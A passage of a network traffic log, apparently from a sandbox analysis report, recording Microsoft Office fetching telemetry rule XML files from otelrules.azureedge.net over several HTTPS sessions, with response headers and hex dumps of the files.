                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              97192.168.2.46381813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                              x-ms-request-id: 5d06e460-b01e-0084-1f08-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061613Z-16ccfc49897d4xzbhC1DFWg2yn00000001fg00000000chqn
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              98192.168.2.46382113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                              x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061613Z-16ccfc498972c2r2hC1DFWxq6800000001rg0000000040ss
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              99192.168.2.46382013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                              x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061613Z-16dc884887bvr5slhC1DFWw7rw00000001g0000000007yyx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              100192.168.2.46382213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                              x-ms-request-id: c717da75-701e-0050-2e33-2c6767000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061613Z-r159446fcd7dm7pfhC1DFWkcfc0000000100000000001se8
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              101192.168.2.46382313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:13 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                              x-ms-request-id: 9fc533e1-401e-0029-192f-2c9b43000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061613Z-176bd8f9bc5hwksrhC1DFWf9wg00000001p0000000006tzr
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              102192.168.2.46382413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1427
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                              x-ms-request-id: ea16cd7b-801e-00a0-0908-2c2196000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061614Z-16dc884887b4tt9chC1DFWrg2c00000001gg00000000c5f3
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              103192.168.2.46382513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1390
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                              x-ms-request-id: 62bc2ff2-901e-0016-5408-2cefe9000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061614Z-16ccfc49897wlhjjhC1DFWsx6c00000001rg000000002mkf
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              104192.168.2.46382613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                              x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061614Z-16ccfc49897wlhjjhC1DFWsx6c00000001k000000000hw01
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              105192.168.2.46382813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:14 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:14 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1391
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                              x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061614Z-16dc884887btswlthC1DFWs7xw00000001rg000000006ueg
